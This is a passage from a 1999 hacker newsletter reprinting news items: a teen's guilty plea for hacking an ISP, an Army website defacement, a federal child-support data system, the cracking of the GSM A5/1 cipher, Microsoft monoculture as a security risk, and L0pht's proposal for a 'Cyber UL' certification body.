Contact: Sandstorm Enterprises, Inc. James Van Bokkelen (617) 426-5056 jbvb@sandstorm.net or In Washington, DC: Ross Stapleton-Gray
rsgray@sandstorm.net or sales@sandstorm.net
@HWA
15.0 Youth Charged With $20,000 in Damages
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 28th
From HNN http://www.hackernews.com/
contributed by Richard223
The case of a minor from Chesterfield County Mass,
made it into a newspaper in Virginia. The youth has
been charged with breaking into ACIS/BICNet, according
to court documents he caused "the entire system to
crash" which resulted in over $20,000 in damage.
Evidently the Virginia High Technology Crimes Unit was
the investigating office since the suspect used one
Virginia system to route his traffic.
Richmond Times Dispatch
http://gatewayva.com/rtd/dailynews/virginiaarch/hack25.shtml
Chesterfield youth pleads
guilty to hacking
Friday, June 25, 1999
BY MARK BOWES
Times-Dispatch Staff Writer
A Chesterfield County youth who authorities said is intelligent but committed a
foolish act has pleaded guilty to hacking into a Massachusetts Internet
provider's system, disabling it and causing at least $20,000 in damage.
The 16-year-old, whose identity is being withheld because of his age, pleaded
guilty to computer trespassing Monday in Chesterfield Juvenile
and Domestic Relations District Court. The judge continued the matter until
Aug. 12 so he can decide whether to convict the boy of a felony, as charged,
or reduce it to a misdemeanor.
Through his attorney, the boy agreed the evidence was sufficient to convict
him, "but contested whether or not it was maliciously done," which is required
for a felony conviction, said Assistant Chesterfield Commonwealth's Attorney
Aubrey M. Davis Jr.
"I didn't see it as [a malicious] act," Davis said. "I think it was a foolish act by
an intelligent kid who didn't really realize the significance of what he was
doing. He's a pretty daggone smart kid."
Virginia State Police Special Agent Sal Girgente, who investigated the case
here, gave a summary of evidence in court on Monday.
According to evidence, the boy, using his mother's Internet account, hacked
into the computer network of ACIS/BICNet, an Internet service
provider in Ayer, Mass., in August. State police also believe he succeeded in
breaking into the computer systems of New Mexico State University and
Aurora Communications Exchange Ltd., in Ontario, Canada.
Investigators believe he may have hacked into the latter two systems to "cover
his tracks" before breaking into the Internet provider's network.
The state police's new High Technology Crimes Unit began investigating the
case after getting a referral from the FBI's Boston field
office. An agent there succeeded in tracking an intruder into the ACIS/
BICNet system back through a Virginia Internet provider to the boy's home in
Chester.
During an intrusion on Aug. 8, police believe the teen and possibly
accomplices replaced system files, among other things, created a new account
and turned off system logging, according to court documents. That caused the
company's e-mail system to be out of service for 12 hours.
Several days later, the intruder again broke into the system and succeeded in
causing "the entire system to crash," court papers say. The resulting damage,
police said, topped $20,000.
The teen "succeeded in bringing the system to its knees," Girgente said. Three
FBI traces were successful in leading authorities to the Chesterfield family's
Internet account. Police believe the boy and other hackers broke into the
system to play games or create chat rooms.
� 1999, Richmond Newspapers Inc.
@HWA
16.0 Army Fights Online Battle And Looses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 29th
From HNN http://www.hackernews.com/
contributed by Space Rogue
Early Monday morning one of the the four web servers
for the US Army came under attack. The web page
poked at the FBI and their recent raids of the members
of the group gH. www4.army.mil was quickly noticed as
being defaced and was restored by 6am. It is believed
that the attackers used a highly publicized exploit for
Cold Fusion, an exploit for which a patch has been
available for weeks.(Hmmmmm, maybe I should reenlist
and help them out?)
HNN Cracked Pages Archive - Be sure to read the html comments.
http://www.hackernews.com/archive/crackarch.html
CNN
http://www.cnn.com/TECH/computing/9906/28/AM-ArmyHacked.ap/
San Jose Mecury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/590787l.htm
APB Online
http://www.apbonline.com/911/1999/06/28/hack0628_01.html
MSNBC
http://www.msnbc.com/news/284765.asp
Nando Times
http://www.techserver.com/story/body/0,1634,65142-103297-733898-0,00.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2285307,00.html
CNN;
Hackers attack Army's main Internet site
June 28, 1999
Web posted at: 7:37 PM EDT (2337 GMT)
WASHINGTON (AP) -- Computer hackers defaced the Army's main Web
site in the latest digital attack on a federal system. Pentagon workers noticed it
early Monday and repaired it.
Army spokesman Jim Stueve said administrators believe hackers altered the
www.army.mil site between 8 p.m. Sunday and 5 a.m. Monday, but no
internal systems were affected. "There were no security breaches," he said.
The altered site announced the attack "has a purpose ... to settle rumors"
about the demise of the loosely organized hacker group that claimed
responsibility for the May attack on the White House Web site.
Another message hidden within the altered page's computer code urged
people who saw it to "trust very few people."
Stueve said he noticed the defaced page when he arrived for work Monday
morning. It was replaced by 6 a.m.
"I just looked at it and just went on to my favorites (other sites) and blew it off
because I knew they were going to get to it right away," he said.
The attack comes in the wake of several others on prominent government
Internet sites, including those of the White House, FBI and Senate. Military
pages have long been favorites of hackers.
"They're always the target," said Keith Rhodes, a director in the information
management division in the General Accounting Office, the investigative
branch of Congress. "It's almost like a rite of passage. You have to bust a
(military) site to have any credibility."
Just last week, experts told the House Science Committee's technology panel
that managers at many federal agencies fail to consider computer security
adequately and have too few employees with sufficient training.
Rhodes, who was among those testifying last week, said Monday that the
Defense Department's computer-security expertise is uneven.
"They're the best and the worst in computer security," Rhodes said. "They've
got some real pros, some of the best in the business. But the DOD is huge ...
and some of the areas in the Department of Defense don't have very good
security."
Outside security experts said they believed the Army site's attackers used a
relatively well publicized security loophole in the popular Cold Fusion software
package. The Army said only that the incident was under investigation.
"The community of attackers is getting better at what they do, and a lot of
their tools are getting automated," Rhodes said. "And a lot of the software
being sent out is getting worse -- designed for flash with security as an
afterthought. You put up your Web site, and its gets creamed."
@HWA
17.0 Welfare Reform Law Invades Privacy of US Citizens
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 29th
From HNN http://www.hackernews.com/
contributed by Weld Pond
The Personal Responsibility and Work Opportunity
Reconciliation Act of 1996 was primarily passed to
reform the welfare system in the United States. One of
the little known provisions of this law is that employers
must report all new hires and salary changes to the
government on a quarterly basis, this information
eventually makes its way to the Administration for
Children and Families. Starting next month the program
will require banks to search for accounts on people
determined to be delinquent on their child-support
payments. (Ed Note: This is an eye opening article and
is recommended. It is long and the good stuff is at the
bottom.)
The Charlotte Observer
http://www.charlotte.com/click/wiretech/pub/009020.htm
Posted at 7:45 p.m. EDT Saturday, June 26, 1999
Huge new electronic `dragnet'
assailed by privacy advocates
By ROBERT O'HARROW JR.
The Washington Post
WASHINGTON -- As part of a new and aggressive effort to track down parents
who owe child support, the federal government has created a vast computerized
data-monitoring system that includes all individuals with new jobs and the names,
addresses, Social Security numbers and wages of nearly every working adult in
the United States.
Government agencies have long gathered personal information for specific
reasons, such as collecting taxes. But never before have federal officials had the
legal authority and technological ability to locate so many Americans found to be
delinquent parents -- or such potential to keep tabs on Americans accused of
nothing.
The system was established under a little-known part of the law overhauling
welfare three years ago. It calls for all employers to quickly file reports on every
person they hire and, quarterly, the wages of every worker. States regularly must
report all people seeking unemployment benefits and all child-support cases.
Starting next month, the system will reach further. Large banks and other
financial institutions will be obligated to search for data about delinquent parents
by name on behalf of the government, providing authorities with details about
bank accounts, money-market mutual funds and other holdings of those parents.
State officials, meanwhile, have sharply expanded the use of Social Security
numbers. Congress ordered the officials to obtain the nine-digit numbers when
issuing licenses -- such as drivers', doctors' and outdoorsmen's -- in order to
revoke the licenses of delinquents.
Enforcement officials say the coupling of computer technology with details about
individuals' employment and financial holdings will give them an unparalleled
ability to identify and locate parents who owe child support and, when necessary,
withhold money from their paychecks or freeze their financial assets.
``They never get away from us anymore. It's just wonderful. . . . What you're
trying to do in child support is build a box, four walls, around a person,'' said
Brian Shea, the acting executive director of child-support enforcement in
Maryland. ``It has in some ways revolutionized this business.''
But privacy experts and civil libertarians say the scope of the effort raises new
questions about the proper line between aggressive public policy and intrusive
government snooping. In pursuing an objective that is almost universally
applauded, the government has also created something that many Americans
have staunchly opposed: a vast pool of fresh personal information that could be
used in a variety of ways to monitor their lives.
``What you have here is a compilation of information that is much better and more
current than any other data system in the U.S.,'' said Robert Gellman, an
attorney and privacy specialist in Washington, D.C. ``All of the sudden we're on
the verge of creating the Holy Grail of data collection, a central file on every
American.''
Already lawmakers, federal agencies and the White House have considered
expanding the permitted aims of the system to include pinpointing debtors, such
as students who default on government loans.
Under the system, every employer must send information about new hires and
quarterly wages to state child-support agencies. State officials gather the data,
along with information on unemployment benefits and child-support cases, and
then ship it to computers run by the Administration for Children and Families.
ACF officials then use computers to sort and send back to state authorities
reports about people obligated to pay child support.
Government officials say the system is safe, accurate and discreet. They also
say it is secure. Because it has, among other safeguards, systems that confirm
the accuracy of Social Security numbers, officials say it will not intrude into the
lives of most people.
An examination of the program, however, shows that government officials have
downplayed or overlooked a variety of privacy and security concerns as they
worked to meet congressional deadlines.
The computer system that houses much of the data at the Social Security
Administration ``has known weaknesses in the security of its information
systems,'' according to a Dec. 31 report by the General Accounting Office. And
authorities have not studied the frequency of mistakes that might arise from
incorrect data, even though the system will enable local child-support
enforcement officials to routinely freeze a parent's assets without an additional
court hearing.
Few people know about the system, even though it was created through one of
the signature acts of Congress and the Clinton administration -- the ``Personal
Responsibility and Work Opportunity Reconciliation Act of 1996,'' the law that
ended the federal guarantee of welfare payments. Much of the congressional
debate and news coverage at the time focused on the broad policy and political
implications of the new law.
Officials have not publicized their ability to obtain financial information because
they do not want to alert delinquents to the ability of enforcement workers to
seize or freeze financial assets, according to Michael Kharfen, spokesman for the
federal Administration for Children and Families, which administers the program.
-0-
When welfare reformers on Capitol Hill and the White House approved the system
in 1996, their aim was to cut down welfare spending by boosting child-support
payments.
(Begin Optional Trim)
They had in mind people such as Stephanie Dudley and her son, Robert, who live
in Farmington, Minn. Robert's father had split up with Dudley shortly after the boy
was born and drifted from place to place. He owed $350 a month in child-support
payments, but it was hard tracking him down and getting him to pay.
Officials found Robert's father -- and then started withholding money from his
paycheck -- after a new employer in Pennsylvania reported him to the network. ``I
literally was living from check to check,'' Dudley said. ``I mean, that money
literally put shoes on the kids' feet, helped pay the rent.''
Kathy Robins of Tazewell, Va., and her 7-year-old son, Dwight, never received
court-ordered child support until the system turned up his father in North Carolina.
Now she gets about $120 a month, money she plans to use to pay for a
babysitter this summer. ``It'll help,'' she said. ``I mean, it's better than I was
getting before, which was nothing.''
Child-support advocates contend that fears about privacy are overblown when
weighed against such successes.
(End Optional Trim)
As of 1997, the latest year for which figures available, more than 7.4 million
delinquents owed more than $43 billion in past child support. The system has
helped boost support payments from $12 billion in 1996 to $14.4 billion last year,
officials said. And in 1997, the burgeoning system helped enforcement programs
locate more than 1.2 million delinquents.
The system is essentially an electronic dragnet. It collects the names, Social
Security numbers and other data about every newly hired employee in the nation
from employers, who also must provide pay reports for most wage-earning adults.
States ship along the names and other identifying information of people who
receive state unemployment insurance.
The Administration for Children and Families, a part of the Department of Health
and Human Services, serves as a sort of clearinghouse that automatically
matches all of that information against a file of nearly 12 million child support
cases to locate parents obligated to pay support.
Then the agency provides information about those parents -- no matter whether
they are behind on payments -- to the appropriate state enforcement workers.
The idea is to track the parents across state lines.
Supporters of the system note that Congress explicitly restricted access to it.
Those authorized to use the information include the Social Security
Administration, which can use the directory of new hires to verify unemployment
reports; the Treasury Department, which can use it to cross-reference
tax-deduction claims; and researchers, who gain access only to anonymous
data.
Next month, financial institutions that operate in multiple states will begin
comparing a list of more than 3 million known delinquents against their customer
accounts. Under federal law, the institutions are obligated to return the names,
Social Security numbers and account details of delinquents they turn up.
The Administration for Children and Families will then forward that financial
information to the appropriate states. For security reasons, Kharfen said, the
agency will not mix the financial data with information about new hires, wages
and the like. Bank account information will be deleted after 90 days.
In a test run this spring, Wells Fargo identified 72,000 customers whom states
have identified as delinquents. NationsBank found 74,000 alleged delinquents in
its test.
(Begin Optional Trim)
Civil liberties activists say it would be a mistake to consider the system solely in
terms of finding bad parents and making them pay up. They worry that the
network sets a new standard for data surveillance by using computers to
cross-reference hundreds of millions of personal records about Americans.
Over the past quarter-century, since the Privacy Act was enacted in 1974, the
federal government has tried to place limits on how its officials could compare
databases to find or profile people. And in general, the government was supposed
to limit data collection about people who paid taxes, received a federal benefit,
served in the military or tangled with the judicial system.
Critics say this new effort leaps beyond those practices by systematically
creating centralized files about workers, wages and families, and sifting through
those files to find a relatively small number of suspected deadbeats.
The new registry of child-support cases, for example, now requires the names of
all parents and children involved, even if they do not receive public assistance or
ask for help in getting a problem resolved. The registry has information about
nearly 12 million families.
There is also concern about the government's reliance on private employers and
financial institutions to watch citizens. A proposal last year to require banks to
routinely track customer transactions for signs of criminal activity prompted an
outpouring of protest. Regulators ditched the plan, called Know Your Customer,
this spring after acknowledging they had misstepped.
Taylor Burke, vice president of Burke & Herbert Bank & Trust Co. in Alexandria,
Va., said he doesn't believe banks should be asked to watch their customers so
closely on behalf of the government. ``We're all good citizens. But it doesn't mean
we spy on our neighbors,'' Burke said. ``It's really scary.''
A review of the swift development of the system has turned up still other
questions about whether the government paid enough attention to privacy --
particularly at a time when the issue has become a flash point in public policy
debates across the country.
As the system was phased in, officials posted federally required notices only in
the Federal Register. No additional information has been added to W-4 forms that
people must fill out when taking a new job.
In addition to the issues raised by the GAO about the security of computer
systems gathering and transmitting personal information, the systems in about a
dozen states also have not been certified by federal officials as meeting security
and privacy guidelines.
Officials in OMB and the Administration for Children and Families sought to allay
fears about mistakes. While acknowledging they have no idea about the likely
rate of errors because no study was conducted, officials said the program verifies
the accuracy of any Social Security numbers before sending data along to the
states.
In addition, officials said, individuals in every state will have an opportunity to
appeal administrative actions. Virginia, for instance, will give parents up to 10
days before seizing assets, a state official said.
Critics wonder what might happen to someone who is away on vacation or
business. ``A Social Security number is not a bullet-proof identifier. There are
always going to be mistakes,'' said Mary J. Culnan, a business professor at
Georgetown University's McDonough School of Business, who drew an analogy
to problems with the accuracy of credit reports in the early 1990s.
Finally, the operation appears to be at odds with the Clinton administration's
recent push to make privacy a priority. Last month, Clinton called on banks and
other financial institutions to give consumers more control over how their
information is gathered and used. ``President Clinton believes that consumers
deserve notice and choice about the use of their personal information,'' said a
White House memo about the event.
(End Optional Trim)
The assurances of officials do little to assuage the fears of people who worry
about the potential ills of having a government that closely monitors its citizens.
Such anxieties have been underscored by mistakes child-support enforcement
workers have made in recent years. Last year, officials in Virginia had to
apologize to 2,300 parents for misidentifying them as delinquent and announcing
they would lose their hunting and fishing licenses. Officials attributed the mistake
to a computer programming error. ``We're not perfect,'' a state official said at the
time.
California officials also misidentified hundreds of men after it began the federally
mandated, data-driven crackdown on deadbeats. In some cases, they confused
men who had similar names.
``In my estimation, this is going to be nothing more than a huge invasion of
privacy,'' said James Dean of Oshkosh, Wis., who was unable to get a fishing
license because he refused to provide his Social Security number.
AP-NY-06-26-99 1916EDT
@HWA
18.0 GSM Mobile Security is Cracked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 29th
From HNN http://www.hackernews.com/
contributed by Weld Pond
The A5/1 over-the-air voice privacy algorithm used by
almost all GSM digital phones is no longer secure. A5/1
is the algorithm used by GSM phones to encrypt
communications. It is theorized that software to
decrypt captured conversations will be available within a
year. The COMP128 algorithm used to authenticate GSM
phones for network access, was cracked last year.
The Australian
http://technology.news.com.au/techno/4221778.htm
GSM mobile security is cracked
By DAN TEBBUTT
22jun99
DIGITAL mobile phone users could soon face the threat of
eavesdropping, following a breakthrough reverse engineering effort in
the United States.
Three California researchers say they have cloned the secret
encryption method used to secure Global System for Mobile (GSM)
communications.
Research leader Marc Briceno predicted unscrambling software could
appear before the end of the year, following academic papers studying
possible faults in the A5/1 over-the-air voice privacy algorithm.
This standard is used in nearly all digital mobile phones in Australia.
Inherent flaws in the security technology suggested special cracking
hardware devices could unscramble GSM conversations within seconds,
according to Mr Briceno, director of the US-based Smartcard
Developers Association.
A network of personal computers could unlock the encryption method
within a matter of hours.
"Mobile users should be worried about this," he said.
"Calls can be intercepted by a moderately motivated adversary who by
no means needs to be a cryptography expert.
"The telecommunications providers' promise that GSM is secure with
respect to random listeners can certainly no longer be maintained."
The reverse engineering project would allow greater public scrutiny over
closely guarded GSM security technologies, he said.
The reference implementation would allow academic cryptographers to
probe for deficiencies in A5/1.
"Once the holes are found, any competent programmer can write an
implementation to exploit those shortcomings."
Vodafone technical director Jonathan Withers warned against
over-stating theoretical problems.
"Practical attacks are pretty hard," he said.
But Mr Withers confirmed that GSM security standards were watered
down after concerns were raised by law enforcement agencies.
"A5/1 is set at a level that is deemed appropriate and acceptable by
law enforcement," he said.
Telstra and Optus representatives declined to comment.
Australian Communications Authority standards and compliance manager
Grant Symons defended digital security as adequate for the job.
"The GSM algorithm has proven its worth for people engaged in
everyday business and social activities. We're not talking about the
military here," he said.
Mr Briceno said the synthesised algorithm was so functionally similar to
the real A5/1 code that it could complete published GSM encryption
benchmarks.
Last year he was part of a University of California, Berkeley, team that
broke the COMP128 algorithm used to authenticate GSM phones for
network access � prompting fears of billing fraud on digital mobile
phones.
"In a business environment, where people believe their call is secure,
the cost of eavesdropping could be a lot more than a few dollars on a
phone bill," Mr Briceno said.
@HWA
19.0 Microsoft Mono-culture Poses National Security Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 29th
From HNN http://www.hackernews.com/
contributed by Adam
This article asks the right question "Is Microsoft a threat
to national security?" but misses a few key points. The
threat is worse than this article says. Remember Melissa
made it on board a Navy ship and jumped the supposed
air-gap onto SIPRNet two things that could not have
happened if the military was not dependent on one
company's productsts. The article talks about a CyberUL
type of organization, this idea has been around for a
while and was first proposed by Tan. Oh, and the part
of a Mac being unhackable, don't believe it.
Forbes
http://www.forbes.com/penenberg/
CyberUL Proposal- By Tan
http://www.l0pht.com/cyberul.html
HNN Archive for March 31, 1999- Melissa on board 7th Fleet
http://www.hackernews.com/arch.html?033199#3
HNN Archive for April 5, 1999- Melissa Jumps AirGap onto SIPRNet
http://www.hackernews.com/arch.html?040599#2
Forbes;
Is Microsoft a threat to national security?
IN SEPTEMBER 1997, the USS Yorktown, the Navy's first "smart
ship," was conducting routine maneuvers off Cape Charles, Va.
Things were fine until the onboard computer system, powered
by Microsoft NT software, crashed, leaving the ship dead in
the water for 2 hours and 45 minutes.
Communications were knocked out. Weapons systems were down.
The propulsion system wouldn't restart. If you think rebooting
your laptop after it freezes is a drag, how would you like to
try and reboot an entire battle cruiser?
Was it sabotage or an
electromagnetic pulse? Nothing so
dramatic: The computer was simply asked to divide by
zero.
Officials were quick to exonerate Microsoft for the
glitch, claiming it was human error, and the Navy
continues to install Windows NT servers on all its
cruisers and destroyers, some 84 ships in all.
Perhaps Navy brass haven't heard the joke making the
rounds in military computer circles: What does NT
stand for? Needs towing.
The question is, What would have happened if this had
occurred in battle?
Of course, the Navy should modernize its fleet,
incorporating the best computer technology this
nation's geeks can create within the fabric of its ships.
Should the Navy rely on Microsoft products, which
have proved to be unstable, unreliable, hard to
troubleshoot and riddled with security holes? It is
ironic that as one part of the U.S. government goes
after Microsoft in court, accusing it of monopolistic
practices, Microsoft is quietly gaining a monopoly over
another part.
Hackers--and now virus makers--have long delighted in
taunting the "Satan from Redmond," churning out
software programs that exploit holes in Microsoft
products. Some of them have deliciously crude
names, too, like Back Orifice, a software program
originally created by a group called The Cult of the
Dead Cow. Because Back Orifice enables a user to
control and monitor a Windows operating system over
a network without being detected, it is on just about
every good hacker's laptop. It is easy to find--type it
into almost any search engine and you'll encounter
lists of sites that offer it as a free download.
What is particularly distressing is the emergence of
the Microsoft mono-technology culture, in which its
many products are tightly bundled together--Windows
OS plus Microsoft Excel plus Microsoft Word plus
Microsoft Outlook E-mail could very well equal big
trouble. As Microsoft's dominance grows, Microsoft
users become even more vulnerable.
Case in point: In March, the Melissa virus swept
America, spreading when a user opened an attached
Microsoft Word file. Upon activation, it looked for
Outlook--Microsoft's E-mail, newsreader and personal
information manager--created a message, and sent it
to the first 50 people listed in the user's address book.
Thankfully, the virus did not destroy or alter data, or
trash hard drives, but it did flood networks with E-mail.
This was not true of "Explore.exe," an Internet worm
named for the file that launches it. In June,
Explore.exe erased billions of gigs of information
around the world.
Melissa and Explore.exe received wide coverage in the
media, but you may not have heard of the most recent
Microsoft security hole in Microsoft's Internet
Information Server, which, according to eEye Digital
Security Team, left approximately 90% of 1.3 million
Microsoft web servers vulnerable to hack attacks. It
seems that as soon as Microsoft develops a patch to
combat a new exploit, someone comes up with a new
one. By the time you read this column, I wouldn't
doubt that more holes will be identified and plugged.
"No one knows what evil lurks in these 40 million lines
of Windows NT code," says Rick Forno, author of The
Art of Information Warfare. "You have to roll the dice
and take your chances."
His solution: Buy a Mac. They are virtually
unhackable, he says. And he's not kidding.
But Forno, who truly believes that Microsoft is a threat
to our nation's security, has other ideas, too. He
proposes a kind of software version of the Underwriters
Laboratory, a not-for-profit product safety testing group
for electronics that has been around since 1894. It is
responsible for the "UL-approved" stickers you see on
lamps, Christmas tree lights and clock radios.
As for me, I'd like to change the model by which
software companies peddle their products. Instead of
allowing them to license software, which lets them
dodge responsibility for poor quality, software vendors
should be held liable for glitches that lead to security
snafus and crashes. If you bought a car with locks on
the door that didn't work properly, odds are the
manufacturer would be held liable. So should software
makers.
In addition, the government, and corporations, could
lessen the impact of the next round of Melissa viruses
or Explore.exe worms by relying on more than one
operating system. The less we depend on one type of
operating system, the less vulnerable we are.
Of course, this runs smack into Bill Gates'
monopolistic vision: to place Windows on every
computer, PDA, Navy ship and toaster. But Gates is
only the richest man in the world, not the only
software vendor in town.
And that's how he should be treated.
Do you think heavy reliance on Microsoft products
threatens our national security? Let me know in my
forum.
Related links:
The Art of Information Warfare
http://www.taoiw.org
Underwriters Laboratory
http://www.ul.com
CyberUL Proposal- By Tan
(Reprint)
Cyberspace Underwriters Laboratories
[2]tan@l0pht.com
Cyberspace Underwriters Laboratories - 01/11/1999
Underwriters Laboratory
Underwriters Laboratories was founded in 1894 by an electrical
inspector from Boston, William Henry Merrill. In 1893, Chicago
authorities grew concerned over the public safety due to the
proliferation of untamed DC circuits and the new, even more dangerous
technology of AC circuits. These new and little-understood
technologies threatened our society with frequent fires which caused
critics to question if the technology could ever be harnessed safely.
Merrill was called in and setup a one-room laboratory with $350.00 in
electrical test equipment and published his first report on March 24,
1894.
Back in Boston, insurance underwriters rejected Merrill's plans for a
non-biased testing facility for certification of electrical devices.
Chicago however, embraced the idea. Merrill took advantage of the
situation in Chicago to get up and running and within months had
support at the national level.
Today, UL has tested over 12,500 products world-wide and is a
internationally recognized authority on safety and technology. The UL
mark of approval has come to provide an earned level of trust between
customers and manufacturers and safely allowed our society to leverage
hundreds of inventions that would have otherwise been unfit for public
use.
While originally targeting inventions which could potentially cause
physical harm to the user, the UL has expanded into the listing of
alarm system products as well as alarm system installers. Individual
products are listed as meeting UL standards and the companies that
install those products are also listed as qualified to install the
product as intended. Insurance companies have leveraged the UL's
scrutiny to properly ascertain their risks.
Cyberspace
Today, technology continues to grow at a rapid pace, perhaps even out
of control. The commercialization of the Internet has led many
businesses to offer services out there in what has been called the
Wild Wild West (WWW). As a result, the public safety is at risk.
Utilities are bridging control systems to Internet attached
back-office systems. Banks are offering 'cyber-banking' and merchants
are collecting information about consumers as they transact their
business over the Web. Individual privacy and the fiduciary trust
banks and merchants have established over hundreds of years are open
to new threats as these activities become more and more prevalent.
Similarly to early electrical inventions, today's computer security
products may introduce more harm than good when implemented by end
users. While some of these products do what they claim, most do not.
The lack of standards and meaningful certification has allowed the
sale of products that are either intentionally or unintentionally
snake-oil. While many of the products may solve old problems and
inadvertently introduce worse ones, some just do not perform as
advertised at all. For instance, some products have been marketed as
utilizing the latest and greatest encryption mechanisms when in fact,
the version they are selling does not utilize any encryption at all.
Just as in the late 1800's, the consumers have little understanding of
the inventions they are purchasing. They are presented with claims by
the product's marketers and have no way of proving those claims to be
true or false. Just as it was back then, this has not stopped the
large-scale application of these inventions, regardless of public
safety. In the late 1900's, nobody has stepped up to the plate to
expand the UL's role into computer security products or to take that
role as their own. To some extent, groups like Nomad Mobile Research
Center and L0pht Heavy Industries have acted as modern day Merrill's,
publishing non-biased findings to this affect.
This is not to say that certification of computer security products
has not been attempted in the past. ICSA for instance, operates a
certification program for products. CISSP and other organizations also
offer certification of information security professionals. These
organizations however, have failed drastically at providing what the
UL has provided on a more general 'technology' level. These failures
could be examined in detail but such an excersise is outside the scope
of this article.
The bottom line for ICSA is that it does not have the rigorous
standards that the UL has and its credibility has suffered as a
result. ICSA fails to see the certification process as ongoing or
cyclical allowing for products to inherit their 'certification'. As a
result, it is believed by some that there is a problem in that there
is a lack of non-biased inspection of software and that money buys
more certifications than good product design and implementation.
CISSP certifies individuals in the computer security industry. While
sorting out those who are fluent in the industry jargin and concept,
the work of CISSP's still lacks accountability in that their
certification is tied to a test rather than what the UL referrs to as
a 'field counter-check'. Like most computer certifications however,
this is simply a test of test-taking skills rather than a test of
experience and understanding.
Cyber-UL
Product certification needs to be performed on every version of a
product. Small changes that could ripple through traditional
technologies causing safety problems are at least ten fold when
applied to computer software. Many similarities may be drawn between
the certification of computer security products and the listing of
alarm systems and components that UL performs today.
UL has a stringent set of tests which are performed on physical
security systems which seek UL listing. For instance, safes and vaults
have a number of different labels which indicate their adherence to
different standards. UL utilizes 'young hotshot' safe-crackers wishing
to make a name for themselves, to do the actual testing. This way,
specialists are motivated (by not only fame but by financial
compensation as well) to validate the claims that the vendors'
marketing people want to make. The entire safe and vault business
operates around these ratings to communicate to the customer what it
is that the product was designed to do. Based on value and risk, a
customer may choose to spend more or less on higher or lower rated
labels.
The two major factors which influence the level of rating are time and
tools. The 'hotshot' safe-crackers are given samples of the product
and guidelines for their attempts to defeat its security. For
instance, a TL-30 rating means that the cracker is limited to tools
not including torches or explosives and is given 30 minutes of actual
working time to defeat the security. If X6 is appended to the rating,
the rating applies to not only the door, but the container (the rest
of the safe). This aligns the vendor's claims to the actual
performance of the product. Also, if a new version of the safe comes
out, it does not inherit the old version's listing, it must be
re-listed.
This addresses a big problem that was sure to arise with safe vendors
and has definitely risen in the computer security arena. Customers,
due to human nature, want products to be certified as 'secure'. Just
as customers like to hear promises of security, vendors love to make
them. In 1913, UL tested the first 'security devices'. With this
expansion into security devices, they recognized the need to replace
the word 'Approved' with the words 'Inspected' or 'Listed'. Due to
what UL has established with security devices, customers are not
lulled into a false sense of security and vendors do not make
outrageous claims. Customers are presented with 'product x is rated at
rating y' rather than 'its ICSA certified'. Vendors claim to be
resistant to certain toolsets for certain amounts of time. This is not
what the computer security field looks like today, but is where it
needs to go. The manufacturer and consumer must realize that testing
'security' is not the same as testing 'functionality' and because of
that, claims need to be adjusted to fit reality. If a door-knob opens
a door, the door works. If a safe-lock opens when you dial the
combination, it does not mean the safe works. You can however, perform
tests on the safe to assure that it operates as advertised within
certain heat and force constraints.
While listing individual devices as meeting UL standards is useful to
a security professional or consumer, it is only a small part of the
picture. Installation and configuration of components is critical to
the actual effectiveness of the security solution. For this reason,
installation of alarm systems is another area of influence for the UL.
This may seem like a daunting task since the number of implementations
is exponential to the number of products. UL has, with only about
4,000 employees, listed more than 12,500 products in over 40 countries
and developed over 600 standards for product safety. The tact taken to
assure the correct installation of alarm systems has been to list
alarm installation companies. Systems installed by UL listed companies
may qualify for a UL issued certificate. The certificate registers the
customer's alarm system becomes an eligible candidate for 'field
counter-checks' (spot-audits) which are performed to assure that
listed installers are not cutting corners. If a system which has
received a certificate fails the field counter-check, the installer
could potentially loose their UL listing. The UL has maintained a
quality program by scaling the number of field counter-checks as
needed.
Problems with the model
While the UL model for security devices seems to address many of the
same issues that surround Cyberspace, there are a number of problems
with deploying the model for computer security devices as it stands.
The first problem is that if a security system is defeated in the
physical world, it is typically very obvious to those who come into
work on Monday and see that the money is gone and the safe is in
pieces. Detection of a cyber intrusion is typically NOT very obvious
to those who come into work on Monday. Because of this fact,
safe-crackers have very limited time to crack a vault. Hackers on the
other hand, have unlimited time to crack a system. Once they get in,
safe crackers typically REMOVE items which then become 'missing'.
Hackers typically COPY items unless their motives are political rather
than financial, leaving the originals and the system intact. For cyber
intrusions to become less surreptitious, intrusion detection needs to
mature and become more widely deployed if 'time' is to be a meaningful
factor in the process.
The commercial model is based around the storage of valuables,
particularly jewelry and cash. In addition to the (American) UL
standards (TL-15, TL-30, TRTL-30, TRTL-15/6, TRTL-30/6, TXTL-60),
there is a German standard (A,B,C1,C2,D 10, D20, E 10) and a
Scandinavian standard (60-80, 80-100, 100-120, 120-140, 140-160,
160-180, 180-200, 200-240, 240-280, 280-320, 320-360). All three are
based on time and tools. Time and tools is an excellent set of
criteria for rating computer security components in areas such as
encryption. In America, the various insurance agencies determine what
rating is required for them to insure a given amount to be stored in
the safe or vault. In Europe, the Dutch Safe Rating Committee
publishes a similar standard assigning a range of financial value to
each rating in each of the three systems.
This does not, however, address liability for storage of information
such as credit ratings, social security numbers, bank balances, web
surfing preferences, political affiliations, which is subject not only
to theft but to alteration or even just surreptitious access. When
storing sensitive information, a more appropriate place to look for
examples is to the government. Classified information presents many of
the same requirements for storage that sensitive information on the
public or even commercial interests.
To meet the U.S. Government's needs in this area, General Services
Administration (GSA) has published standards (classes 1-8, black, red,
green and blue labels) which rate storage containers for everything
from weapons to information processing systems to filing cabinets.
They additionally publish information on storage of confidential,
secret, and top-secret materials in GSA Approved (or Non-GSA Approved)
containers. This information includes additional requirements for
alarm systems, restricted building access, guard check points, etc...
Specifics on GSA classes and labels are seemingly difficult to come
by. Based on the information I have found in the document library of
locks.nfsec.navy.mil/document_library/guides however, much of what has
been worked out by the GSA could potentially serve as a foundation for
developing similar standards for the storage of information on the
public.
The U.S. Department of Commerce has commissioned the National
Institute of Standards and Technology (NIST) to maintain FIPS PUB
140-1, Security Requirements For Cryptographic Modules. The document
sets forth a standard for specification of cryptographic-based
security systems protecting unclassified information. It provides for
product ratings from 1 to 4 with 1 being lame and 4 being k-rad. This
range is designed to cover a wide range of data sensitivity, from 'low
value administrative data' to 'million dollar funds transfers' to
